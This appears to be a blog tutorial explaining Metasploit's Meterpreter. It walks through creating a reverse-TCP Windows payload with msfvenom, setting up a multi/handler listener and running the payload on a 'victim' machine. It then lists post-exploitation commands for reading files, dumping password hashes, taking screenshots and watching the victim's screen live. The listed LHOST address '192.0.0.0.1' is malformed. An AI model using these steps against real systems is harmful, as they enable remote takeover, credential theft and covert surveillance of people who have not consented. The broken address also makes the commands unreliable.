EXPLAINED METERPRETER
WELCOME TO TAMILCODE
SO IN THIS WEBSITE, WE GOING TO DISCUSS WHAT IS METERPRETER? HOW TO USE IT? HOW ITS WORK?
WHAT IS A METERPRETER?
Meterpreter is nothing but it is an extensible and dynamically payload and it has been used to interact with the connection between the two machines...
FOR AN EXAMPLE :
there is an attacker which is Linux and victim windows now wants to make the connection between systems what would you do? the above scenario has been for user privilege only!!!!..in this case, their lot of ideas but the better solution is meterpreter which used the connection between two systems.....
HOW ITS WORK?
1.The target executes the initial stage which is reverse, blind
2.The stages load the DLL injection.
3. And the meterpreter core has been initialized and Metasploit receives this GET and client configuration...
4. And you can load the meterpreter command in your machine ...
METEPRETER DESGIN GOAL :
It is a stealthy tool
which is entered into memory and nothing to disk
inject the DLL injection .....
It is a powerful tool
channelized communication system
TLV protocol encryption
It is an extensible tool
load over in-network etc...
so next we going to create the payload using the msfvenom and to get a session of meterpreter
And we going to review some commands in meterpreter ...
In this scenario we going to use the to machine one is attacker Linux and another one is victim windows .....
STEP 1 : Create the payload using msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.0.0.0.1 LPORT=8080 -f exe > stages.exe
NOTE :
for your kind information please use your IP address in LHOST which is localhost and any random port etc ...
And set Listener in attacker machine which Linux
STEP 2: msfconsole
type the msfconsole to open the Metasploit ...
STEP 3: use exploit/multi/handler
STEP 4: set payload windows/meterpreter/reverse_tcp
STEP 5: set LHOST 192.0.0.0.1
STEP 6: set LPORT 8080
warning :
set your ip address in LHOST and use the port you used while
creating the payload.....
STEP 7: run
so next run payload in windows which in victim machine .....
so now we going to execute the payload in windows which is the victim in this case .....
booooooooooom!!!!!!!
Now we get the meterpreter session in the attacker machine (Linux)
Next, we see some basic command in meterpreter
if want more detail enter command help in the meterpreter session ...
CAT :
COMMAND: cat
which can be used to cat file in the machine (to read the file )
MKDIR:
COMMAND: mkdir
which used to make the directory in the victim machine ...
PS:
COMMAND: ps
which used to see the process in victim (PID (process identifier) )
NETSTAT
COMMAND: netstat
which used to see the network connection in the machine
HASHDUMP:
COMMAND: run hashdump
which is used to dump the hash in the machine (maybe password hash)
SCREENSHOT:
COMMAND: screenshot
which is used to take pictures of the machine
SCREENSHARE:
COMMAND: screenshare
which is used to watch the victim machine live...
so in this case you get the HTML file so load the HTML file in your browser...
IDLE TIME:
COMMAND: idletime
you can identify the movement of the machine
for ex: I click the machine using mouse or keyboard now you can watch the last time of movement (clicking time)
WATCH PART 2 VIDEO OFFICIALLY
FACEBOOK LINK :
WEBSITE LINK :
IF LIKE OUR WORK PLEASE SUBSCRIBE MY
WEBSITE AND SHARE THIS !!!!!!!
DON'T MISS THE COMMENT !!!
and if want to support us please use the below link
Post a Comment